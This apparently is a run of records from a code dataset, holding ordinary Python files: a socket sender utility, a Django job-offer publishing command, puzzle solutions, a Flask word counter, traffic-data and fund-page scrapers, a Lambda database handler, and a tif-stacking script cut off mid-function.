for each thread (for remote debugging)\n :return:\n \"\"\"\n id_th = threading.get_ident()\n return 8000+id_th%100\n\n\ndef do_send_loop(server_address, feature_instance, n_msgs=1000, raise_excp=False,sleep_time=-1):\n print('INIT SENDER')\n\n def loop_send():\n with socket_sender(server_address,verbose=False) as send_fun:\n if n_msgs == -1:\n while True:\n try:\n if sleep_time != -1:\n time.sleep(sleep_time)\n out_dict = feature_instance.process()\n send_fun(out_dict)\n except Exception as e:\n print('EXCEPTION {0}'.format(e))\n if raise_excp:\n raise e\n else:\n for i in range(n_msgs):\n try:\n if sleep_time != -1:\n time.sleep(sleep_time)\n out_dict = feature_instance.process()\n send_fun(out_dict)\n except Exception as e:\n print('EXCEPTION {0}'.format(e))\n if raise_excp:\n raise e\n print('EXITING SENDER')\n send_fun({'END':True}) # END signal\n\n if feature_instance.use_context:\n with feature_instance.model_context():\n loop_send()\n else:\n loop_send()\n\n print('END SENDER')\n return\n\n\ntry:\n from line_profiler import LineProfiler\n\n def do_profile(follow=[]):\n def inner(func):\n def profiled_func(*args, **kwargs):\n try:\n profiler = LineProfiler()\n profiler.add_function(func)\n for f in follow:\n profiler.add_function(f)\n profiler.enable_by_count()\n return func(*args, **kwargs)\n finally:\n profiler.print_stats()\n return profiled_func\n return inner\n\nexcept ImportError:\n raise ImportError\n def do_profile(follow=[]):\n \"Helpful if you accidentally leave in production!\"\n def inner(func):\n def nothing(*args, **kwargs):\n return func(*args, **kwargs)\n return nothing\n return inner\n","repo_name":"aferral/gungeon_bot","sub_path":"state_fusion/deploy_utils.py","file_name":"deploy_utils.py","file_ext":"py","file_size_in_byte":4704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"26955334958","text":"from django.core.management.base import BaseCommand\n\nfrom joboffers.models import JobOffer\n\n\nclass TestPublishCommand(BaseCommand):\n def add_arguments(self, parser):\n parser.add_argument(\"--offer-id\", type=int, required=False)\n\n def _handle_publish(self, options, publisher_class):\n \"\"\"Command handler for any publisher.\"\"\"\n offer_id = options.get('offer_id')\n status = None\n raw_status = None\n publisher = publisher_class()\n\n if offer_id is not None:\n job_offer = JobOffer.objects.get(id=offer_id)\n self.stdout.write(self.style.SUCCESS(f'Publicando oferta #{offer_id}.'))\n status = publisher.publish(job_offer)\n else:\n self.stdout.write(self.style.SUCCESS('Publicando una prueba.'))\n raw_status = publisher._push_to_api(\n 'Esto es una prueba de post.\\nhttps://github.com/PyAr/pyarweb',\n 'Título de prueba',\n 'https://github.com/PyAr/pyarweb'\n )\n\n if raw_status == 200 or status == publisher.RESULT_OK:\n self.stdout.write(\n self.style.SUCCESS(\n f'Oferta publicada con éxito en: {publisher.name}.'\n )\n )\n else:\n self.stderr.write(\n self.style.ERROR(\n f'Hubo un error al querer publicar la oferta en: {publisher.name}.'\n )\n )\n","repo_name":"PyAr/pyarweb","sub_path":"joboffers/management/commands/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"61"} +{"seq_id":"42344566588","text":"# https://adventofcode.com/2020/day/5\n\nfrom day import Day\nimport re\n\n\nclass Day5(Day):\n def __init__(self, file_name: str):\n super().__init__(5, file_name)\n self.pattern = re.compile(r'^([FB]{7})([RL]{3})$')\n\n def part_1(self):\n answer = -999999999\n for line in self.input_data:\n match = self.pattern.match(line)\n if match:\n seat_id = (self.parse_row(match.group(1)) * 8 +\n self.parse_col(match.group(2)))\n answer = max(answer, seat_id)\n return answer\n\n def part_2(self):\n answer = None\n seats = []\n for line in self.input_data:\n match = self.pattern.match(line)\n if match:\n row = self.parse_row(match.group(1))\n col = self.parse_col(match.group(2))\n seat_id = (row * 8 + col)\n seats.append(seat_id)\n # we have all the seats (other than our own) so order them\n seats.sort()\n # now our seat will be between the two seats with a gap of 2\n for i, seat in enumerate(seats):\n if i == len(seats) - 1:\n break\n if seats[i + 1] - seat == 2:\n answer = seat + 1\n return answer\n\n # these row/cols are just other ways of representing binary\n def parse_row(self, string: str):\n return int(string.replace('B', '1').replace('F', '0'), 2)\n\n def parse_col(self, string: str):\n return int(string.replace('R', '1').replace('L', '0'), 2)\n","repo_name":"akakalz/advent_of_code_2020","sub_path":"src/day_05/day_05.py","file_name":"day_05.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42620587489","text":"list=[]\nlist1=[]\nn=int(input())\nfor i in range(n):\n \n \n \n name=input()\n marks=input()\n list1.append([name,float(marks)])\n list.append(float(marks))\nlist=set(list)\nA=min(list)\nlist.remove(A)\nvalue=min(list)\nlist1.sort()\nfor j in range(len(list1)):\n if(value==list1[j][1]):\n print(list1[j][0])\n \n\n","repo_name":"bhaskarkalahasthi/pythonprograms","sub_path":"nested list conceopt program.py","file_name":"nested list conceopt program.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30834769505","text":"def finder(files, queries):\n my_hash = {}\n result = []\n for query in queries:\n my_hash[query] = True\n \n for file_ in files:\n current = file_.replace('/', \" \").split()\n if current[-1] in my_hash:\n result.append(file_)\n \n\n return result\n\n\nif __name__ == \"__main__\":\n files = [\n '/bin/foo',\n '/bin/bar',\n '/usr/bin/baz'\n ]\n queries = [\n \"foo\",\n \"qux\",\n \"baz\"\n ]\n print(finder(files, queries))\n","repo_name":"prietopedro/Python-Training","sub_path":"Lambda School Daily Projects/04 - HashTables and Blockchain/03 - Sprint HashTables Problems/hashtables/ex5/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74355844353","text":"from django.conf.urls import include, url\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\n\nfrom frame import utils\nfrom hstool import views, public\n\n\nadmin.autodiscover()\n\ndoc_type_urls = [\n url(r'^list/$', views.DriverTypeView.as_view(), name='list'),\n url(r'^add/$', views.DriverTypeAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.DriverTypeUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.DriverTypeDelete.as_view(),\n name='delete'),\n]\n\nsteep_category_urls = [\n url(r'^list/$', views.SteepCategoryView.as_view(), name='list'),\n url(r'^add/$', views.SteepCategoryAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.SteepCategoryUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.SteepCategoryDelete.as_view(),\n name='delete'),\n]\n\nimpact_type_urls = [\n url(r'^list/$', views.ImpactTypeView.as_view(), name='list'),\n url(r'^add/$', views.ImpactTypeAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.ImpactTypeUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.ImpactTypeDelete.as_view(),\n name='delete'),\n]\n\ntime_horizon_urls = [\n url(r'^list/$', views.TimeHorizonView.as_view(), name='list'),\n url(r'^add/$', views.TimeHorizonAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.TimeHorizonUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.TimeHorizonDelete.as_view(),\n name='delete'),\n]\n\nmetadata_urls = [\n url(r'^steep_category/', include(steep_category_urls,\n namespace='steep_category')),\n url(r'^doc_type/', include(doc_type_urls, namespace='doc_type')),\n url(r'^impact_type/', include(impact_type_urls, namespace='impact_type')),\n url(r'^time_horizon/', include(time_horizon_urls,\n namespace='time_horizon')),\n]\n\nsettings_urls = [\n url(r'^geographic_scopes/required/$',\n views.GeoScopesRequired.as_view(), name='geo_scopes_required'),\n url(r'^roles/$', views.RolesOverview.as_view(), name='roles'),\n url(r'^metadata/', include(metadata_urls, namespace='metadata')),\n]\n\nsources_urls = [\n url(r'^list/$', views.SourcesList.as_view(), name='list'),\n url(r'^add/$', views.SourcesAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.SourcesUpdate.as_view(), name='update'),\n url(r'^delete/(?P\\d+)/$', views.SourcesDelete.as_view(), name='delete'),\n]\n\ndrivers_urls = [\n url(r'^list/$', views.DriversList.as_view(), name='list'),\n url(r'^add/$', views.DriversAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.DriversUpdate.as_view(), name='update'),\n url(r'^delete/(?P\\d+)/$', views.DriversDelete.as_view(), name='delete'),\n]\n\nindicators_urls = [\n url(r'^list/$', views.IndicatorsList.as_view(), name='list'),\n url(r'^add/$', views.IndicatorsAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.IndicatorsUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.IndicatorsDelete.as_view(),\n name='delete'),\n]\n\nimplications_urls = [\n url(r'^list/$', views.ImplicationsList.as_view(), name='list'),\n url(r'^add/$', views.ImplicationsAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.ImplicationsUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.ImplicationsDelete.as_view(),\n name='delete'),\n]\n\nfigures_urls = [\n url(r'^list/$', views.FiguresList.as_view(), name='list'),\n url(r'^add/$', views.FiguresAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.FiguresUpdate.as_view(), name='update'),\n url(r'^delete/(?P\\d+)/$', views.FiguresDelete.as_view(), name='delete'),\n]\n\nimpacts_urls = [\n url(r'^list/$', views.ImpactsList.as_view(), name='list'),\n url(r'^add/$', views.ImpactsAdd.as_view(), name='add'),\n url(r'^update/(?P\\d+)/$', views.ImpactsUpdate.as_view(), name='update'),\n url(r'^delete/(?P\\d+)/$', views.ImpactsDelete.as_view(), name='delete'),\n]\n\nassessments_urls = [\n url(r'^list/$', views.AssessmentsList.as_view(), name='list'),\n url(r'^add/$', views.AssessmentsAdd.as_view(), name='add'),\n url(r'^detail/(?P\\d+)/$', views.AssessmentsDetail.as_view(),\n name='detail'),\n url(r'^detail/(?P\\d+)/relations$', views.assessments_relations,\n name='relations'),\n url(r'^update/(?P\\d+)/$', views.AssessmentsUpdate.as_view(),\n name='update'),\n url(r'^delete/(?P\\d+)/$', views.AssessmentsDelete.as_view(),\n name='delete'),\n]\n\nrelations_urls = [\n url(r'add/$', views.RelationsAdd.as_view(), name='add'),\n url(r'update/(?P\\d+)/$', views.RelationsUpdate.as_view(),\n name='update'),\n url(r'delete/(?P\\d+)/$', views.RelationsDelete.as_view(), name='delete')\n]\n\nmodals_urls = [\n url(r'^detail/(?P\\d+)/(?P\\w+)/(?P\\d+)/$',\n views.ViewModal.as_view(), name='relations_detail'),\n url(r'^add/indicators/$', views.AddIndicatorsModal.as_view(), name='add'),\n url(r'^add/(?P\\w+)/$', views.AddModal.as_view(), name='add'),\n url(r'^add/success/(?P\\w+)/(?P\\d+)$',\n views.AddModalSuccess.as_view(),\n name='add_success'),\n url(r'^view/figure/(?P\\d+)/$', views.ViewFigureModal.as_view(),\n name='view_figure'),\n]\n\nentries_urls = [\n url(r'$', views.UserEntriesView.as_view(), name='list'),\n url(r'^delete/(?P\\d+)/$', views.UserEntriesDelete.as_view(),\n name='delete'),\n]\n\npublic_urls = [\n url(r'^drivers-change', public.DocList.as_view(), name='doc_list'),\n]\n\nurlpatterns = [\n url(r'^$', views.HomeView.as_view(), name='home_view'),\n url(r'^assessments/', include(assessments_urls, namespace='assessments')),\n url(r'^settings/', include(settings_urls, namespace='settings')),\n url(r'^assessments/(?P\\d+)/relations/',\n include(relations_urls, namespace='relations')),\n url(r'^sources/', include(sources_urls, namespace='sources')),\n url(r'^docs/', include(drivers_urls, namespace='drivers')),\n url(r'^implications/', include(implications_urls,\n namespace='implications')),\n url(r'^indicators/', include(indicators_urls, namespace='indicators')),\n url(r'^figures/', include(figures_urls, namespace='figures')),\n url(r'^impacts/', include(impacts_urls, namespace='impacts')),\n url(r'^modals/', include(modals_urls, namespace='modals')),\n url(r'^_lastseencount/$', utils.get_objects_from_last_seen_count),\n url(r'^entries/', include(entries_urls, namespace='entries')),\n url(r'^public/', include(public_urls, namespace='public')),\n url(r'^admin/', include(admin.site.urls)),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"eea/flis.horizon-scanning-tool","sub_path":"hstool/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40469480630","text":"\"\"\"\nGiven a binary tree, return the postorder traversal of its nodes' values.\n\nFor example:\nGiven binary tree {1,#,2,3},\n 1\n \\\n 2\n /\n 3\nreturn [3,2,1].\n\nNote: Recursive solution is trivial, could you do it iteratively?\n\n\"\"\"\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def postorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n if not root:\n return []\n ans = []\n self.postorderHelper(root, ans)\n return ans\n \n def postorderHelper(self, root, ans):\n if not root:\n return\n self.postorderHelper(root.left, ans)\n self.postorderHelper(root.right, ans)\n ans.append(root.val)\n \nclass Solution2(object): # non recursion\n def postorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n if not root:\n return []\n ans = []\n stack = [(root, False)]\n while stack:\n popEle, isVisited = stack.pop()\n if popEle is None:\n continue\n \n if isVisited == True:\n ans.append(popEle.val)\n else:\n stack.append((popEle, True))\n stack.append((popEle.right, False))\n stack.append((popEle.left, False))\n return ans\n","repo_name":"akb46mayu/Data-Structures-and-Algorithms","sub_path":"BinaryTree and Divide and Conquer/le145_binaryTreePostorderTraversal.py","file_name":"le145_binaryTreePostorderTraversal.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74996667073","text":"# Создать страницу, на которой будет форма для ввода текста и\n# кнопка \"Отправить\"\n# При нажатии кнопки будет произведен подсчет количества слов\n# в тексте и переход на страницу с результатом.\n# files: form4.html, result_4.html\n\nfrom flask import Flask, render_template, request, redirect, url_for\n\napp = Flask(__name__)\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n if request.method == 'POST':\n text = request.form['text']\n len_text = len(text)\n return redirect(url_for('result', count=len_text))\n return render_template('form_4.html')\n\n\n@app.route('/result/')\ndef result(count):\n return render_template('result_4.html', count=count)\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"zaryushka/flask_fastapi_hw2","sub_path":"task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12192555772","text":"#import tensorflow as tf\nimport matplotlib.dates as mdates\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport glob, os\nfrom datetime import datetime, timedelta\nimport datetime\nimport pandas as pd\nfrom gql.transport.requests import RequestsHTTPTransport\nfrom gql import gql, Client\nimport json\nimport requests\nimport pytz\n\n\n\n\nMODEL_TYPE = \"rnn_updated\"\nLOG_DIR = f\"../EiT/tmp/logs/{MODEL_TYPE}\"\nLOG_LEVEL = \"ERROR\"\nTARGET_PATH = \"../EiT/final_datasets\"\n\nmodel_24h_path_local = \"../EiT/tmp/models/rnn_updated/rnn_updated_20210303_162009/model\"\n\n#model_24h = tf.keras.models.load_model(f\"{model_24h_path_local}/saved_model\")\n\n\nparams = {\n 'input_sequence_len': 48,\n 'output_sequence_len': 24,\n}\n\n\n\"\"\"\n Returns the live data, i.e. downloads last 48h of data from the various providers and returns it\n Returns: \n dates : pd.DataFrame.index.values -> The dates of the input data\n data : pd.DataFrame.values.astype('float32') -> The input data that is given to the model\n labels : pd.DataFrame.values.astype('float32') -> The labels of the input data given to the model\n\"\"\"\ndef get_live_data():\n pass\n\n\"\"\"\n Performs prediction on the given data\n Assumes data is on the same format as the data returned from \"get_live_data\"\n Returns:\n pred_dates : pd.DataFrame.index.values -> The dates of the prediction interval (24h)\n model_labels : pd.DataFrame.values.astype('float32') -> The predicted values of the model\n baseline_labels : pd.DataFrame.values.astype('float32') -> The predicted values of the baseline\n\"\"\"\ndef perform_prediction(dates, data, labels):\n pass\n\n\ndef get_PRA_data(start, stop, station):\n #print(\"In get_PRA_data\")\n\n sample_transport = RequestsHTTPTransport(\n url='https://www.vegvesen.no/trafikkdata/api/',\n use_json=True,\n headers={\n \"Content-type\": \"application/json\",\n },\n verify=False,\n retries=3\n )\n\n client = Client(\n transport=sample_transport,\n # fetch_schema_from_transport=True,\n )\n\n heading = '''\n trafficData(trafficRegistrationPointId: \"%s\") {\n trafficRegistrationPoint {\n name\n id\n latestData {\n volumeByHour\n }\n trafficRegistrationType\n manualLabels {\n affectedLanes {\n lane {\n laneNumber\n }\n }\n validFrom\n validTo\n }\n commissions {\n validFrom\n validTo\n lanes {\n laneNumber\n }\n }\n direction {\n to\n from\n }\n location {\n coordinates {\n latLon {\n lat\n lon\n }\n }\n }\n }\n ''' % (station)\n\n after = \"\"\n next = True\n response = \"\"\n first = True\n\n while next:\n query_string = '''\n {\n %s\n volume {\n byHour(%sfrom: \"%s\", to: \"%s\") {\n pageInfo {\n hasNextPage\n endCursor\n }\n edges {\n node {\n from\n to\n byDirection {\n heading\n total {\n coverage {\n percentage\n unit\n unavailable {\n numerator\n denominator\n percentage\n }\n uncertain {\n numerator\n denominator\n percentage\n }\n included {\n numerator\n denominator\n percentage\n }\n }\n }\n byLengthRange {\n lengthRange {\n lowerBound\n upperBound\n }\n total {\n volumeNumbers {\n volume\n validSpeed {\n total\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n ''' % (heading, after, start, stop)\n #print (f\"Query string is: {query_string}\")\n query = gql(query_string)\n\n this_response = client.execute(query)\n #print(\"this_response is: \" + json.dumps(this_response))\n # Let us first of all do some checking on the response to determine if we have data\n try:\n x = this_response['trafficData']['volume']['byHour']['edges']\n except KeyError:\n # No edges means no data, just return empty response\n #print(\"No edges in this_response\")\n return \"\"\n if not x:\n # edges list exist but list is empty also means no data, just return empty response\n #print(\"edges exists in this_response but edge list is empty\")\n return \"\"\n\n #print (f\"this_response type is: {type(this_response)}\")\n #print(\"this_response is: \" + json.dumps(this_response))\n if first:\n #print(\"This is the first response...\")\n this_response_str = json.dumps(this_response)\n response = response + this_response_str[:this_response_str.rindex(\"]\")] + \",\"\n first = False\n else:\n #print(\"This is a subsequent response...\")\n this_response_str = json.dumps(this_response[\"trafficData\"][\"volume\"][\"byHour\"][\"edges\"])\n this_response_str = this_response_str[this_response_str.index(\"[\")+1:]\n response = response + this_response_str[:this_response_str.rindex(\"]\")] + \",\"\n\n # Check this_response to see if there are more pages and if yes, set after to endCursor\n if this_response[\"trafficData\"][\"volume\"][\"byHour\"][\"pageInfo\"][\"hasNextPage\"] == True:\n #print(\"Next is True\")\n endCursor = this_response[\"trafficData\"][\"volume\"][\"byHour\"][\"pageInfo\"][\"endCursor\"]\n after = '''after: \"%s\", ''' % (endCursor)\n heading = '''trafficData(trafficRegistrationPointId: \"%s\") {''' % (station)\n else:\n #print(\"Next is False\")\n next = False\n\n #print(\"Clean up the response...\")\n # remove last comma\n response = response[:response.rindex(\",\")]\n # Add closing brackets\n response = response + \"]}}}}\"\n #print(\"Return the response...\")\n return response\n\noslo_tz = pytz.timezone('Europe/Oslo')\ndatetime_stop = datetime.datetime.now().replace(tzinfo=pytz.utc).astimezone(oslo_tz).replace(minute=0, second=0, microsecond=0)\n\nmet_elements = \"air_temperature,surface_air_pressure,wind_speed,wind_from_direction,relative_humidity,specific_humidity,road_water_film_thickness,sum(duration_of_precipitation PT1H),sum(precipitation_amount PT1H),cloud_area_fraction,surface_snow_thickness,sea_surface_temperature,volume_fraction_of_water_in_soil\"\n\nhours = 1\ndatetime_stop = datetime_stop - timedelta(hours=2)\ndatetime_start = datetime_stop - timedelta(hours=hours)\n\ndatetime_stop = datetime_stop + timedelta(hours=1) # To include last hour (PRA does not include last)\nstop = datetime_stop.isoformat()\nstart = datetime_start.isoformat()\n\ndata = get_PRA_data(start, stop, None)\nprint(data)\n","repo_name":"christianbv/EiT","sub_path":"live_prediction.py","file_name":"live_prediction.py","file_ext":"py","file_size_in_byte":7814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72335408194","text":"# coding:utf-8\r\nimport requests\r\nfrom Response import Response\r\nimport logging\r\n\r\nclass NetworkService(object):\r\n\t#取自chrome的一次访问\r\n\tDEFAULT_HEADER = {\r\n\t\t'Connection': 'keep-alive',\r\n\t\t'Pragma': 'no-cache',\r\n\t\t'Cache-Control': 'no-cache',\r\n\t\t'Upgrade-Insecure-Requests': '1',\r\n\t\t'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36',\r\n\t\t'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\r\n\t\t'Accept-Encoding': 'gzip, deflate, sdch',\r\n\t\t'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6',\r\n\t}\r\n\tdef __init__(self):\r\n\t\tsuper(NetworkService, self).__init__()\r\n\t\tself.session = None\r\n\t\tself.cur_proxies = None\r\n\r\n\tdef _update_session(self, proxies):\r\n\t\t#if proxies != self.cur_proxies:\r\n\t\tif self.session:\r\n\t\t\tself.session.close()\r\n\t\t\tself.session = None\r\n\t\tif not self.session:\r\n\t\t\tself.session = session = requests.Session()\r\n\t\t\tsession.headers.update(self.DEFAULT_HEADER)\r\n\t\t\tsession.keep_alive = False\r\n\t\t\tself.cur_proxies = proxies\r\n\t\t#requests.adapters.DEFAULT_RETRIES = 5\r\n\r\n\tdef clear(self):\r\n\t\tif self.session:\r\n\t\t\tself.session.close()\r\n\t\t\tself.session = None\r\n\t\tself.cur_proxies = None\r\n\r\n\tdef send_request(self, request, **kwargs):\r\n\t\tlogging.info('Requesting {}'.format(request))\r\n\t\tself._update_session(kwargs.get('proxies'))\r\n\r\n\t\tif request.method == 'post':\r\n\t\t\tr = self.session.post(request.url, request.data, **kwargs)\r\n\t\telif request.method == 'get':\r\n\t\t\tr = self.session.get(request.url, **kwargs)\r\n\t\telse:\r\n\t\t\traise NotImplementedError()\r\n\t\treturn Response(body=r.content, url=r.url, status=r.status_code, meta=request.meta)\r\n\r\n\r\n\r\n","repo_name":"c0nnyr/MrSpider","sub_path":"NetworkService.py","file_name":"NetworkService.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30137908801","text":"import json\nimport logging\nimport os\n\nimport records\nfrom sqlalchemy import text\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nshmenkins_db_url = os.environ[\"DB_URL\"]\n\ndb = records.Database(shmenkins_db_url)\n\n\ndef run(event, context):\n logger.info(f\"start; event={event}\")\n\n try:\n body = json.loads(event[\"body\"])\n url = body[\"url\"]\n except Exception as e:\n logger.error(e)\n return {\"statusCode\": 400, \"body\": \"Bad Request\"}\n\n try:\n with db.transaction():\n cursor = db.db.execute(text(\"insert into scm_repo(url) values(:url)\"), url=url)\n body[\"id\"] = cursor.lastrowid\n response_body = json.dumps(body)\n except Exception as e:\n logger.error(e)\n return {\"statusCode\": 500, \"body\": \"Internal server error\"}\n\n logger.info(f\"finish; id={body['id']}\")\n return {\"statusCode\": 201, \"body\": response_body}\n","repo_name":"rzhilkibaev/shmenkins2","sub_path":"src/shmenkins2/PostScmRepo.py","file_name":"PostScmRepo.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23567540881","text":"from math import floor, log2\r\nfrom collections import defaultdict\r\n\r\nwith open(\"C-small-2-attempt1.in\", \"r\") as inp:\r\n with open(\"C-small-2-attempt1.out\", \"w\") as outp:\r\n cases = int(inp.readline().strip())\r\n for i in range(cases):\r\n stalls, people = [int(k) for k in inp.readline().split()]\r\n obj_level = floor(log2(people)) + 1\r\n stalls_count = defaultdict(int)\r\n stalls_count[stalls] = 1\r\n tuples_count = defaultdict(int)\r\n for j in range(obj_level):\r\n stalls_count_bis = defaultdict(int)\r\n for stalls, count in stalls_count.items():\r\n if stalls % 2 == 0:\r\n stalls_count_bis[stalls/2] += count\r\n stalls_count_bis[stalls/2 - 1] += count\r\n if j == obj_level-1:\r\n tuples_count[(stalls/2, stalls/2 - 1)] += count\r\n else:\r\n k = floor(stalls/2)\r\n stalls_count_bis[k] += 2*count\r\n if j == obj_level-1:\r\n tuples_count[(k, k)] += count\r\n stalls_count = stalls_count_bis\r\n order = people - 2**(obj_level-1) + 1\r\n tup_c_list = list(tuples_count.items())\r\n tup_c_list = sorted(tup_c_list, key=lambda x: x[0][0]+x[0][1],\r\n reverse=True)\r\n if order <= tup_c_list[0][1]:\r\n outp.write(\"Case #\" + str(i+1) + \": \" +\r\n str(int(tup_c_list[0][0][0])) + \" \" +\r\n str(int(tup_c_list[0][0][1])) + \"\\n\")\r\n elif order <= tup_c_list[0][1] + tup_c_list[1][1]:\r\n outp.write(\"Case #\" + str(i+1) + \": \" +\r\n str(int(tup_c_list[1][0][0])) + \" \" +\r\n str(int(tup_c_list[1][0][1])) + \"\\n\")\r\n else:\r\n outp.write(\"Case #\" + str(i+1) + \": \" +\r\n str(int(tup_c_list[2][0][0])) + \" \" +\r\n str(int(tup_c_list[2][0][1])) + \"\\n\")\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1503.py","file_name":"1503.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24943045485","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nimport re\n\n\ndef get_html(page):\n '''获取html'''\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n 'Accept-Encoding':'gzip, deflate',\n 'Accept-Language':'zh-CN,zh;q=0.9',\n 'Cache-Control':'max-age=0',\n 'Connection': 'keep-alive',\n 'Content-Type':'application/x-www-form-urlencoded',\n 'Upgrade-Insecure-Requests':'1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36',\n 'Referer':'http://cx.cnca.cn/'\n }\n\n url=\"https://neris.csrc.gov.cn/alappl/home/gongshi2.do?pageNo={}\".format(page)\n strhtml = requests.get(url,headers=headers,verify=False)\n return strhtml.text\n\ndef parse_one_page():\n html=get_html(page=101)\n soup = bs(html, 'lxml')\n title = soup.select('.titleshow')\n for i in title:\n if '嘉实' in i.text:\n print(i.text)\n # a=re.findall('嘉实基金',html)\n # b=re.match()\n # print(title)\n\n\nif __name__ == '__main__':\n parse_one_page()","repo_name":"SmasterZheng/leetcode","sub_path":"算法题/4.爬虫基金.py","file_name":"4.爬虫基金.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13920708612","text":"import os\r\nimport pandas as pd\r\nimport cv2\r\nimport shutil\r\nimport argschema as ags\r\nimport natsort\r\nimport numpy as np\r\nfrom tifffile import imsave, imread\r\nimport psutil\r\n\r\nclass InputSchema(ags.ArgSchema):\r\n\r\n specimen_id = ags.fields.Str(description='specimen id')\r\n raw_single_tif_dir = ags.fields.InputDir(description=\"A directory with individual tif files (z-slices)\")\r\n specimen_dir = ags.fields.InputDir(default=None,description=\"Directory for specimen output files. If none, use basedir of raw_single_tif_dir\")\r\n invert_image_color = ags.fields.Boolean(default=True,description=\"Neural network will expect inverted (black background) images\")\r\n\r\ndef stack_into_chunks(chunk_size,raw_single_tif_dir,chunk_dir,ids):\r\n \"\"\"\r\n Will stack a directory of single tif images into one 3d volume tif image. Assumes the stacks are named in\r\n chronological order.\r\n\r\n :param chunk_size: integer. number of tif slices per 3d chunk\r\n :param raw_single_tif_dir: input directory that has the individual slices of tif images\r\n :param chunk_dir: where to save the 3d tif files\r\n :param ids: specimen id\r\n :return:\r\n \"\"\"\r\n\r\n chunk_n = 0\r\n counter = 0\r\n cv_stack = []\r\n list_of_files = [ii for ii in natsort.natsorted(os.listdir(raw_single_tif_dir)) if '.tif' in ii]\r\n # print('{} Stacking slices into 3D tif chunks'.format(ids))\r\n for files in list_of_files:\r\n counter+=1\r\n # print(files,counter)\r\n img = cv2.imread(os.path.join(raw_single_tif_dir,files),cv2.IMREAD_UNCHANGED)\r\n cv_stack.append(img)\r\n if counter == chunk_size:\r\n chunk_n+=1\r\n cv_stack = np.asarray(cv_stack)\r\n imsave(os.path.join(chunk_dir,'chunk{}.tif'.format(chunk_n)),cv_stack)\r\n cv_stack = []\r\n counter = 0\r\n #if the number of single tif files was a multiple of the chunk_size (usually unlikely)\r\n if (float(len(list_of_files))/float(chunk_size)).is_integer():\r\n print('{} files, {} chunk size'.format(len(list_of_files),chunk_size))\r\n print('The Last Chunk was a multiple of {}'.format(chunk_size))\r\n #otherwise make one last chunk that has overlap so that we 